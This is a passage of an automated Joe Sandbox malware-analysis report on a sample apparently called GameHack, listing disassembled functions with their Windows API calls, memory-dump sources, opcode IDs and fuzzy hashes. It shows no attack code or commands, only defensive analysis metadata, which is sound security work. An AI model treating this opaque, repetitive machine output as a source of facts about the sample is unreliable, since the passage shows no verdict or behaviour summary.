                                      • Instruction Fuzzy Hash: 98F0E93164112DABEB211F669F01B7B77CCEF817B0B15A111AB18F6190CE30DD018AE4
                                      Function 00ED5BD7 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00ED5BDC
                                        • Part of subcall function 00EDB07D: __EH_prolog.LIBCMT ref: 00EDB082
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 970fbf96c4a287a16b9c3cb94d4276e121b07904649541aa6c27b20711ea4b32
                                      • Instruction ID: 69b24bdf0ecf15381187370cef3089634a20e021d1ea383780c0ee84039185f9
                                      • Opcode Fuzzy Hash: 970fbf96c4a287a16b9c3cb94d4276e121b07904649541aa6c27b20711ea4b32
                                      • Instruction Fuzzy Hash: 90014634A05684DAC725FBA8C0553EEFBE4DB59710F40919EE85A63383CBB41B09D6A2
                                      Function 00EF8518 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00EFC13D,00000000,?,00EF67E2,?,00000008,?,00EF89AD,?,?,?), ref: 00EF854A
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 1ee5ab3bf7923f377d16766508317d50c2891a885a8e81aadb52e82f698164b4
                                      • Instruction ID: 0a9883ec57a9923599117063959e7773ba5440908517f56f43c3d45f1f6c0e33
                                      • Opcode Fuzzy Hash: 1ee5ab3bf7923f377d16766508317d50c2891a885a8e81aadb52e82f698164b4
                                      • Instruction Fuzzy Hash: 9EE0E52154112D5BEB3126695E01BBA37CCDF413B4F156221AF5CBA091CE20CC0085E5
                                      Function 00EDA4C6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                      Download Yara Rule
                                      APIs
                                      • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00EDA4F5
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: CloseFind
                                      • String ID:
                                      • API String ID: 1863332320-0
                                      • Opcode ID: a62f302ed97b93f6cb91a5ddcf459cedbcc55d9c181b1ed339a524616293885b
                                      • Instruction ID: 4771211b228fc5469861c02ca88abb685f366765ed1e36e333126cef8f862d4d
                                      • Opcode Fuzzy Hash: a62f302ed97b93f6cb91a5ddcf459cedbcc55d9c181b1ed339a524616293885b
                                      • Instruction Fuzzy Hash: 9CF0E9310093C0ABCA221BB888047CA7BD1EF05335F08DA0AF1FD22291C27416879723
                                      Function 00EE067C Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetThreadExecutionState.KERNEL32(00000001), ref: 00EE06B1
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ExecutionStateThread
                                      • String ID:
                                      • API String ID: 2211380416-0
                                      • Opcode ID: c6845f1d87293ed5692a9082d8f37dcbd5f7b0de1e188e0ab44a7025672af406
                                      • Instruction ID: 99392a433dffc049364393f3b87a67c8f8f17f5f774832f5c4116c05807692dc
                                      • Opcode Fuzzy Hash: c6845f1d87293ed5692a9082d8f37dcbd5f7b0de1e188e0ab44a7025672af406
                                      • Instruction Fuzzy Hash: 95D05B3560519925D6213366A8067FE2B9A8FC3714F0A6067B80D77687CFD608C776E2
                                      Function 00EE9D7B Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GdipAlloc.GDIPLUS(00000010), ref: 00EE9D81
                                        • Part of subcall function 00EE9B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00EE9B30
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Gdip$AllocBitmapCreateFromStream
                                      • String ID:
                                      • API String ID: 1915507550-0
                                      • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                                      • Instruction ID: f44f0a0cf439d70e140156642fca2c565dcb12ae7b2332a87f6b95ea56d644f6
                                      • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                                      • Instruction Fuzzy Hash: 88D0A73061424CBADF40BE728C0297A7BECDB00300F009025BC08A6252EDB1DE10A261
                                      Function 00ED9989 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileType.KERNELBASE(000000FF,00ED9887), ref: 00ED9995
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: FileType
                                      • String ID:
                                      • API String ID: 3081899298-0
                                      • Opcode ID: 91dd3696db8aa448c91b71a6fa75e040e4ca600d8b0df9c5c2d23c4e6148396b
                                      • Instruction ID: 260e08c8956639759a02815255fda0dfa5e5f559ed92077277e3d9537551989b
                                      • Opcode Fuzzy Hash: 91dd3696db8aa448c91b71a6fa75e040e4ca600d8b0df9c5c2d23c4e6148396b
                                      • Instruction Fuzzy Hash: 7AD01231011140A58F2146344D190997755DBC336EB38E6A9D025D81A2D733C803F541
                                      Function 00EED41A Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00EED43F
                                        • Part of subcall function 00EEAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00EEAC85
                                        • Part of subcall function 00EEAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EEAC96
                                        • Part of subcall function 00EEAC74: IsDialogMessageW.USER32(00010486,?), ref: 00EEACAA
                                        • Part of subcall function 00EEAC74: TranslateMessage.USER32(?), ref: 00EEACB8
                                        • Part of subcall function 00EEAC74: DispatchMessageW.USER32(?), ref: 00EEACC2
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Message$DialogDispatchItemPeekSendTranslate
                                      • String ID:
                                      • API String ID: 897784432-0
                                      • Opcode ID: 5bcad7ca2b5446edddf1b6b149dbb48a73b144db738e4c50a3b1dc6005225cfe
                                      • Instruction ID: f1e4da97d34ad2f5b8ee827bc7052de8af1aa6084db6f00b9e8d772311bc06ae
                                      • Opcode Fuzzy Hash: 5bcad7ca2b5446edddf1b6b149dbb48a73b144db738e4c50a3b1dc6005225cfe
                                      • Instruction Fuzzy Hash: 0FD09E31144304ABD6116B51CF06F1F7AE6BB88B04F004554B345740B1CA62AD21AB16
                                      Function 00EED8E8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: acae6a2f4de3b1ef6c5d4c24541744b51ccc7d603774103f51b2ad8e25399946
                                      • Instruction ID: fd6be7922e86b55593e2d0aa2e63bea776d4d47087cbd5f674c17613a2eada64
                                      • Opcode Fuzzy Hash: acae6a2f4de3b1ef6c5d4c24541744b51ccc7d603774103f51b2ad8e25399946
                                      • Instruction Fuzzy Hash: 59B012B136D5466C318CB1067D16D36025CC5C0B20330511AB00DF01C1D4809C457432
                                      Function 00EED8FC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: d5007d6585ee42cfa5ed6e11d030e7fa5bd1d66529b5cde6ad01fe00a2459bc1
                                      • Instruction ID: ea3aa3f02ec37cc5a24155ad814cc38fd770c3c04ffad5a68e1568d4436525b1
                                      • Opcode Fuzzy Hash: d5007d6585ee42cfa5ed6e11d030e7fa5bd1d66529b5cde6ad01fe00a2459bc1
                                      • Instruction Fuzzy Hash: FAB012B136D4466C314CB1076D16D36025CD5C0B20330501AB00DF01C1D4409C057432
                                      Function 00EED8F2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 61a3184285fbd39e4929f3d8abc5ed54bebcc5bf8e1c52fb7f9f1269fadb9f4a
                                      • Instruction ID: 1cc605cd53215c6ad5eb6840dd3d8eaeed1fca548320f787016033b035bb95ce
                                      • Opcode Fuzzy Hash: 61a3184285fbd39e4929f3d8abc5ed54bebcc5bf8e1c52fb7f9f1269fadb9f4a
                                      • Instruction Fuzzy Hash: 85B012B136D4466C314CB1066E16D36025CC5C0B20330501AB00DF01C1D4409D067432
                                      Function 00EED8CA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: cde552ad0d4745e541c4fd59d815664283bc3659146c9ae469fd9dc8e6846604
                                      • Instruction ID: 083209ecdbd9c42fa588452b94fc9ef07fc8f0a238b664e365036003c4705376
                                      • Opcode Fuzzy Hash: cde552ad0d4745e541c4fd59d815664283bc3659146c9ae469fd9dc8e6846604
                                      • Instruction Fuzzy Hash: 75B012A136D4466C314CB1076E16D36024CC5C0B20330901AB00DF02C1D4409C0F7432
                                      Function 00EED8C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: f845d2038514a402e15b6fb07dabe55626b0e8b399298ff5e2b61c689156d930
                                      • Instruction ID: 271a3821f4305fce32210976bbb40fb31b67b0e82d62d957839536622bc0d36a
                                      • Opcode Fuzzy Hash: f845d2038514a402e15b6fb07dabe55626b0e8b399298ff5e2b61c689156d930
                                      • Instruction Fuzzy Hash: 8BB012A136D58A6C318CB1067D16D36024CC5C0B20330911AB00DF02C1D4809C8A7432
                                      Function 00EED8DE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 1a32b8f7c540a07389337905af26fc33807002233b3c6839c926c33a28ed733e
                                      • Instruction ID: 119c207f72262d849e1743d6c482157d006d538048d007a64b5de0ad93b0797c
                                      • Opcode Fuzzy Hash: 1a32b8f7c540a07389337905af26fc33807002233b3c6839c926c33a28ed733e
                                      • Instruction Fuzzy Hash: B4B012B136D4466C314CB1066D16D36025CC5C1B20330901AB40DF01C1D4409C057432
                                      Function 00EED8AC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: b3e8d79e5033e798627b37bf8de66a55132075d9ad7997fdf3f22ced9db35af8
                                      • Instruction ID: 642d51b235705b49c294fe1f0101eae492a084b67e448661b241106d4e45b750
                                      • Opcode Fuzzy Hash: b3e8d79e5033e798627b37bf8de66a55132075d9ad7997fdf3f22ced9db35af8
                                      • Instruction Fuzzy Hash: D1B012A536D54A6C314CB1066D56D3B024CF5C0B20330501AB40DF01C1D5409C057532
                                      Function 00EED8B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 7086e672695fc65ca4d6252d6cac4d7bdc70bbcaf75661a5a28bfa6cbd07c178
                                      • Instruction ID: f05ed20e9451d198ef9dca0d7f76df0eaba72c04533f4ae7e830d9603ff56efa
                                      • Opcode Fuzzy Hash: 7086e672695fc65ca4d6252d6cac4d7bdc70bbcaf75661a5a28bfa6cbd07c178
                                      • Instruction Fuzzy Hash: 2FB012A136D4466C314CB1066D16D36024CC5C1B20330D01AB40DF02C1D4409C0E7432
                                      Function 00EED891 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
